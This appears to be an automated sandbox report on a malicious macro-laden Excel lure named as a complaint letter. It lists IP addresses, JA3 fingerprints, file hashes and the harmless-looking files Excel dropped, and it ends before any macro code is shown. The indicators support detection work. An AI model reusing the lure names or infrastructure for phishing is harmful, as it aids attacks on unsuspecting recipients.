DIGITALOCEAN-ASNUS | Shinshin Machinery.exe | malicious | 167.99.187.230
DIGITALOCEAN-ASNUS | HEC Batangas Integrated LNG and Power Project DocumentationsType a message.exe.exe | malicious | 206.189.50.215
DIGITALOCEAN-ASNUS | processhacker-2.39-setup.exe | malicious | 162.243.25.33
DIGITALOCEAN-ASNUS | PO#652.exe | malicious | 192.241.148.82
DIGITALOCEAN-ASNUS | Linux_Reader.exe | malicious | 159.203.148.225
DIGITALOCEAN-ASNUS | IU-8549 Medical report COVID-19.doc | malicious | 134.209.144.106
DIGITALOCEAN-ASNUS | Statement_of_Account_as_of 02_17_2021.xlsm | malicious | 167.71.6.214
DIGITALOCEAN-ASNUS | Quotation.exe | malicious | 67.207.77.53
DIGITALOCEAN-ASNUS | MoqGIIogN0.dll | malicious | 192.241.174.45
DIGITALOCEAN-ASNUS | dAIyRK9gO7.exe | malicious | 138.197.53.157
DIGITALOCEAN-ASNUS | tS9P6wPz9x.exe | malicious | 142.93.110.250
BIZNET-AS-APBIZNETNETWORKSID | Sign_1136845514-2138034493.xls | malicious | 182.253.107.34
BIZNET-AS-APBIZNETNETWORKSID | SecuriteInfo.com.Exploit.Siggen3.10048.21627.xls | malicious | 182.253.107.34
BIZNET-AS-APBIZNETNETWORKSID | vJHWQgfJ23.exe | malicious | 118.99.94.149
BIZNET-AS-APBIZNETNETWORKSID | _161213.exe | malicious | 112.78.142.170
BIZNET-AS-APBIZNETNETWORKSID | _161212.exe | malicious | 112.78.142.170
BIZNET-AS-APBIZNETNETWORKSID | _161212.exe | malicious | 112.78.142.170
BIZNET-AS-APBIZNETNETWORKSID | _161212.exe | malicious | 112.78.142.170
BIZNET-AS-APBIZNETNETWORKSID | _161214.exe | malicious | 112.78.142.170
BIZNET-AS-APBIZNETNETWORKSID | _161212.exe | malicious | 112.78.142.170
BIZNET-AS-APBIZNETNETWORKSID | _161212.exe | malicious | 112.78.142.170
BIZNET-AS-APBIZNETNETWORKSID | _161212.exe | malicious | 112.78.142.170
BIZNET-AS-APBIZNETNETWORKSID | _161213.exe | malicious | 112.78.142.170
BIZNET-AS-APBIZNETNETWORKSID | _161214.exe | malicious | 112.78.142.170
BIZNET-AS-APBIZNETNETWORKSID | _161213.exe | malicious | 112.78.142.170
BIZNET-AS-APBIZNETNETWORKSID | _161213.exe | malicious | 112.78.142.170
BIZNET-AS-APBIZNETNETWORKSID | _103330.exe | malicious | 112.78.142.170
BIZNET-AS-APBIZNETNETWORKSID | _103331.exe | malicious | 112.78.142.170
BIZNET-AS-APBIZNETNETWORKSID | _103330.exe | malicious | 112.78.142.170
BIZNET-AS-APBIZNETNETWORKSID | _103330.exe | malicious | 112.78.142.170
BIZNET-AS-APBIZNETNETWORKSID | _103330.exe | malicious | 112.78.142.170

                  JA3 Fingerprints

Match | Associated Sample Name / URL | Detection | Context
7dcce5b76c8b17472d024758970a406b | Complaint-1992179913-02182021.xls | malicious | 13.126.100.34, 159.89.174.35
7dcce5b76c8b17472d024758970a406b | Complaint-447781983-02182021.xls | malicious | 13.126.100.34, 159.89.174.35
7dcce5b76c8b17472d024758970a406b | mexhlc.xlsx | malicious | 13.126.100.34, 159.89.174.35
7dcce5b76c8b17472d024758970a406b | document-550193913.xls | malicious | 13.126.100.34, 159.89.174.35
7dcce5b76c8b17472d024758970a406b | document-1915351743.xls | malicious | 13.126.100.34, 159.89.174.35
7dcce5b76c8b17472d024758970a406b | SecuriteInfo.com.Heur.15528.xls | malicious | 13.126.100.34, 159.89.174.35
7dcce5b76c8b17472d024758970a406b | Subconract 504.xlsm | malicious | 13.126.100.34, 159.89.174.35
7dcce5b76c8b17472d024758970a406b | upbck.xlsx | malicious | 13.126.100.34, 159.89.174.35
7dcce5b76c8b17472d024758970a406b | IMG_6078_SCANNED.doc | malicious | 13.126.100.34, 159.89.174.35
7dcce5b76c8b17472d024758970a406b | RFQ Manual Supersucker en Espaol.xlsx | malicious | 13.126.100.34, 159.89.174.35
7dcce5b76c8b17472d024758970a406b | _a6590.docx | malicious | 13.126.100.34, 159.89.174.35
7dcce5b76c8b17472d024758970a406b | Small Charities.xlsx | malicious | 13.126.100.34, 159.89.174.35
7dcce5b76c8b17472d024758970a406b | quotation10204168.dox.xlsx | malicious | 13.126.100.34, 159.89.174.35
7dcce5b76c8b17472d024758970a406b | notice of arrival.xlsx | malicious | 13.126.100.34, 159.89.174.35
7dcce5b76c8b17472d024758970a406b | 22-2-2021 .xlsx | malicious | 13.126.100.34, 159.89.174.35
7dcce5b76c8b17472d024758970a406b | Shipping_Document.xlsx | malicious | 13.126.100.34, 159.89.174.35
7dcce5b76c8b17472d024758970a406b | Remittance copy.xlsx | malicious | 13.126.100.34, 159.89.174.35
7dcce5b76c8b17472d024758970a406b | CI + PL.xlsx | malicious | 13.126.100.34, 159.89.174.35
7dcce5b76c8b17472d024758970a406b | RFQ_Enquiry_0002379_.xlsx | malicious | 13.126.100.34, 159.89.174.35
7dcce5b76c8b17472d024758970a406b | 124992436.docx | malicious | 13.126.100.34, 159.89.174.35

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                  Category:dropped
                  Size (bytes):59134
                  Entropy (8bit):7.995450161616763
                  Encrypted:true
                  SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                  MD5:E92176B0889CC1BB97114BEB2F3C1728
                  SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                  SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                  SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):893
                  Entropy (8bit):7.366016576663508
                  Encrypted:false
                  SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                  MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                  SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                  SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                  SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):328
                  Entropy (8bit):3.070945767762452
                  Encrypted:false
                  SSDEEP:6:kKwkHbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:5u3kPlE99SNxAhUeo+aKt
                  MD5:1213E096B9224B4495C4F78601704789
                  SHA1:1EF0ABAD73D4A985BD80F4F8B6B760225E2D7AA1
                  SHA-256:A9D73418788038DAE293776D59BEC80CB8EB62CBC4BA0C689F9CD7AB1BCB0181
                  SHA-512:FDA963840A69EE3B027FDA823BC8D945489D4EACB93FB921999442424F4FAFC12FE6206323B28B43E1982CB18B510F0D5C78088DA6C6C514D7861D1D7D7561B9
                  Malicious:false
                  Reputation:low
                  Preview: p...... ........va.QB...(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...
                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):252
                  Entropy (8bit):3.0294634724686764
                  Encrypted:false
                  SSDEEP:3:kkFklwkfllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFit:kK5aliBAIdQZV7eAYLit
                  MD5:28129F6ECC58852F1AE4AE09A12AC008
                  SHA1:35ACF528D1F3C26C73CCC2E1DE542D86999D0C1B
                  SHA-256:09898C2DEE4D74001B9D5AAC04C1D235CBD0306F509942B4320ADD01B550E653
                  SHA-512:91EF006A4CB425DF99FD69D9B944E6023A40BB66D546A48ED402D84E1F6BB6E7FF3698E14E987E21565C32A6210F849346D74B89825BC91AB738B15A6E2F97C7
                  Malicious:false
                  Reputation:low
                  Preview: p...... ....`.....QB...(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44250678185879600000[1].htm
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:HTML document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):162
                  Entropy (8bit):4.43530643106624
                  Encrypted:false
                  SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGu:q43tISl6kXiMIWSU6XlI5LP8IpfGu
                  MD5:4F8E702CC244EC5D4DE32740C0ECBD97
                  SHA1:3ADB1F02D5B6054DE0046E367C1D687B6CDF7AFF
                  SHA-256:9E17CB15DD75BBBD5DBB984EDA674863C3B10AB72613CF8A39A00C3E11A8492A
                  SHA-512:21047FEA5269FEE75A2A187AA09316519E35068CB2F2F76CFAF371E5224445E9D5C98497BD76FB9608D2B73E9DAC1A3F5BFADFDC4623C479D53ECF93D81D3C9F
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview: <html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..
                  C:\Users\user\AppData\Local\Temp\B1CE0000
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):31749
                  Entropy (8bit):7.6478755803057545
                  Encrypted:false
                  SSDEEP:384:TkBP+gnPEeQXelsUCI8aoVT0QNuzWKPqSFZWWvj1ChWZ3UtjIRrhs7+nOt5O:TkBP+qPEvHXW+u7qSzn1AwUCm5O
                  MD5:0B92F5CE699D9908F484814A6E394592
                  SHA1:10C4598491B10B32CB5B59BB8BCFEF9F1F91860B
                  SHA-256:26DF7450FCEDA4FF99B5C57BC9B9EF77BE32960CB475574BD0880529A6C0AF05
                  SHA-512:D8804CB0471C072EC26C14E92E91472C20C190CFD9D12820E2FB36B49E2D351BCD45CC99653F407AB14FC313FFA37112A042B77E540AA4A6A15362B7D0E6E687
                  Malicious:false
                  Reputation:low
                  Preview: .U.n.0....?......(..r.Mrl.$...\K....I..v..pl).E.R.3;+.N.V.TO.Q{..f.*p.+..y......pJ..ek@v5..i.........O)...e.V`..8.Y.hE.... .Rt./'.o\z...:..l6...x4..Y..FIp..~n..T-.6..:?..k...!.-E....S{.j.Xh...GKb...... Y..Ic.....|.3..q.[..B.a.._.w...[.^g.....F....1.....+.}\._6.dk,..`...c.........(<.T....b....x5r&%...E.X!......\..w<M....\.7..9.........m..b.E.u...u.]...'t.(....}8..m...C~..E.....?..Z.]..i.D.O..B3....b.k..Z....x.A.yJ)P..y...........PK..........!........V.......[Content_Types].xml ...(.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Temp\CabD164.tmp
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                  Category:dropped
                  Size (bytes):59134
                  Entropy (8bit):7.995450161616763
                  Encrypted:true
                  SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                  MD5:E92176B0889CC1BB97114BEB2F3C1728
                  SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                  SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                  SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                  Malicious:false
                  Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                  C:\Users\user\AppData\Local\Temp\TarD165.tmp
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):152788
                  Entropy (8bit):6.316654432555028
                  Encrypted:false
                  SSDEEP:1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
                  MD5:64FEDADE4387A8B92C120B21EC61E394
                  SHA1:15A2673209A41CCA2BC3ADE90537FE676010A962
                  SHA-256:BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
                  SHA-512:655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
                  Malicious:false
                  Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Complaint_Letter_1186814227-02192021.LNK
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:12 2020, mtime=Tue Feb 23 23:16:35 2021, atime=Tue Feb 23 23:16:35 2021, length=57856, window=hide
                  Category:dropped
                  Size (bytes):2288
                  Entropy (8bit):4.5046992261100005
                  Encrypted:false
                  SSDEEP:48:82E1/XT3InX4KstZc64KsPqQh22E1/XT3InX4KstZc64KsPqQ/:82E1/XLInoK+IKoqQh22E1/XLInoK+IT
                  MD5:AA1AC6204DBA6B8233FBE8E75046EDBF
                  SHA1:5F0460E7005BE1F11CF156CF88EA554BFC32E280
                  SHA-256:6416DD5F9D52578CF84CFDACD2F2BAC36F371CAC1A165C23585889664682BAE1
                  SHA-512:98B0590AFD524B7EC11E322865D78BE12D26FFB4D9B4F453634CA59FD62B53840C273C5C6EC0FA5379431C41EA0B91E26B54A39A39150373DB1DBE9CD1F12EC1
                  Malicious:false
                  Preview: L..................F.... ........{..S0.OB...4..OB................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..<..XR.. .COMPLA~1.XLS..~.......Q.y.Q.y*...8.....................C.o.m.p.l.a.i.n.t._.L.e.t.t.e.r._.1.1.8.6.8.1.4.2.2.7.-.0.2.1.9.2.0.2.1...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\928100\Users.user\Desktop\Complaint_Letter_1186814227-02192021.xls.?.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.C.o.m.p.l.a.i.n.t._.L.e.t.t.e.r._.1.1.8.6.8.1.4.2.2.7.-.0.2.1.9.2.0.2.1...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.
                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue Feb 23 23:16:35 2021, atime=Tue Feb 23 23:16:35 2021, length=8192, window=hide
                  Category:dropped
                  Size (bytes):867
                  Entropy (8bit):4.471316211640594
                  Encrypted:false
                  SSDEEP:12:85Q/LgXg/XAlCPCHaXgzB8IB/KvX+Wnicvb3bDtZ3YilMMEpxRljKY6TdJP9TdJ2:85Y/XTwz6IUYePDv3qqrNru/
                  MD5:42F307AF27A8A903CCC2C5C41E83E32E
                  SHA1:EE47888CB4A856FFB7A345586B0B4BA95B19CEB3
                  SHA-256:D253E1CF9C70496A21366E41616941E72C261D1A5A6DC0F3C2BD76205029C4BA
                  SHA-512:9F15635FC6426C4DE0D3BB044E386C7B9D0AA366E9B1C923531C1DFA3E52589A9D007DD8EC12C5326A9EF4E5ADEA7406CE7E2BF83405FB384671DF75C10C052D
                  Malicious:false
                  Preview: L..................F...........7G..S0.OB...S0.OB.... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....XR....Desktop.d......QK.XXR..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\928100\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......928100..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):161
                  Entropy (8bit):4.798894274434397
                  Encrypted:false
                  SSDEEP:3:oyBVomMYl6p0mcTWbt9Sp6l+1l6p0mcTWbt9Sp6lmMYl6p0mcTWbt9Sp6lv:dj6YlccTcXralccTcXrxYlccTcXr1
                  MD5:CADBB04F8298E7962F40328079687B72
                  SHA1:1927A0BC186777DBAAD977E3B7B593EC5D6E5E1B
                  SHA-256:6E08D3312DED62A53033BCCD48D8CB0AF4E52655C2BBEB7151FB690E4CBB7AC4
                  SHA-512:F12057FFE94CFD805C5E0708AF8B066FE93EBB160895C6DD10FCDA4BD8F9AD5FABCA081C94EFCC0DDBC11B0A92F0047C7D41EB7C1A84CAB36A8D634193D51BCC
                  Malicious:false
                  Preview: Desktop.LNK=0..[xls]..Complaint_Letter_1186814227-02192021.LNK=0..Complaint_Letter_1186814227-02192021.LNK=0..[xls]..Complaint_Letter_1186814227-02192021.LNK=0..
                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\05Q27A4H.txt
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:ASCII text
                  Category:downloaded
                  Size (bytes):83
                  Entropy (8bit):4.478685859616817
                  Encrypted:false
                  SSDEEP:3:zWRE2W26tLdfUQ2mFVZO3+KclKfSV3P:zWiYZXqY+KcxV3P
                  MD5:2A642149F8BD635781257176BA2E325B
                  SHA1:5554445EC5FE013AC58896889A6760E8EF0BF308
                  SHA-256:5FFB74F81110B9FF00701A1EC7214F1350B398C0ED4CFE01BCCA217038A2E6C4
                  SHA-512:5F53E3E2AD66DD3A3525E697FDD92F6880BAF2C919E8D63721995884788006FBC803A0A09EE5ED6621F2F12F58122DE3252FC880334DDA575451847CE5A8E0E8
                  Malicious:false
                  IE Cache URL:sportsmarquee.com/
                  Preview: cxssh_status.off.sportsmarquee.com/.1536.2095582592.30890123.1699116689.30870082.*.
                  C:\Users\user\Desktop\72CE0000
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:Applesoft BASIC program data, first line number 16
                  Category:dropped
                  Size (bytes):88554
                  Entropy (8bit):6.543076863136895
                  Encrypted:false
                  SSDEEP:1536:iZ8rmjAItyzElBIL6lECbgBGGP5xLmQWVxdg5fHCI3sEBE/BveFCD3sEBE/Bvezt:iZ8rmjAItyzElBIL6lECbgBGGP5xLm7H
                  MD5:941E03F0B024ED1BCEE4AD91B34DCFAD
                  SHA1:4A6F5E727506E271AF0AB4F5563CC22169D22727
                  SHA-256:9CB707CE9126B0275D98060383F0128F886557ACDBD53A4CB4883312C552F8F9
                  SHA-512:8775C57CEB3BEE2DF65B3BE9CC9EE79A7BEDCFC6C1F1108E1DBECEA7C8DDEA0A31F01D975C6EDB9AB2EE06AB3A5CB408F85F9B9411DB25D25BE03AFA8141AF34
                  Malicious:false

                  Static File Info

                  General

                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Last Saved By: Friner, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Feb 19 09:43:01 2021, Security: 0
                  Entropy (8bit):3.6960536280224883
                  TrID:
                  • Microsoft Excel sheet (30009/1) 78.94%
                  • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                  File name:Complaint_Letter_1186814227-02192021.xls
                  File size:146432
                  MD5:888909141f8ad83f4509703b1bae7187
                  SHA1:dab7c94aff5dbeabebf9d85c6b2e7f6e6ba98e18
                  SHA256:f11a1405772bbb1aa0d1e55fc2faa77fe8a5541894e9617fbd8e6430c9e38731
                  SHA512:afd1c1867c093444d9fda969093d2a09e23f279bfbafd6b5a802b14e01ab69467de11bd24484001f8f6baa094486a77f4eb69b1da1159c1f9cd9ac53a043ecf2
                  SSDEEP:3072:GcPiTQAVW/89BQnmlcGvgZ6Gr3J8YUOMht/BI/s/C/i/R/7/3/UQ/OhP/2/a/1/i:GcPiTQAVW/89BQnmlcGvgZ7r3J8YUOMP

                  File Icon

                  Icon Hash:e4eea286a4b4bcb4

                  Static OLE Info

                  General

                  Document Type:OLE
                  Number of OLE Files:1

                  OLE File "Complaint_Letter_1186814227-02192021.xls"

                  Indicators

                  Has Summary Info:True
                  Application Name:Microsoft Excel
                  Encrypted Document:False
                  Contains Word Document Stream:False
                  Contains Workbook/Book Stream:True
                  Contains PowerPoint Document Stream:False
                  Contains Visio Document Stream:False
                  Contains ObjectPool Stream:
                  Flash Objects Count:
                  Contains VBA Macros:True

                  Summary

                  Code Page:1251
                  Author:
                  Last Saved By:Friner
                  Create Time:2006-09-16 00:00:00
                  Last Saved Time:2021-02-19 09:43:01
                  Creating Application:Microsoft Excel
                  Security:0

                  Document Summary

                  Document Code Page:1251
                  Thumbnail Scaling Desired:False
                  Contains Dirty Links:False

                  Streams

                  Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                  General
                  Stream Path:\x5DocumentSummaryInformation
                  File Type:data
                  Stream Size:4096
                  Entropy:0.321292606979
                  Base64 Encoded:False
                  Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                  General
                  Stream Path:\x5SummaryInformation
                  File Type:data
                  Stream Size:4096
                  Entropy:0.272902601407
                  Base64 Encoded:False
                  Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 135192
                  General
                  Stream Path:Book
                  File Type:Applesoft BASIC program data, first line number 8
                  Stream Size:135192
                  Entropy:3.69021498015
                  Base64 Encoded:True

                  Macro 4.0 Code

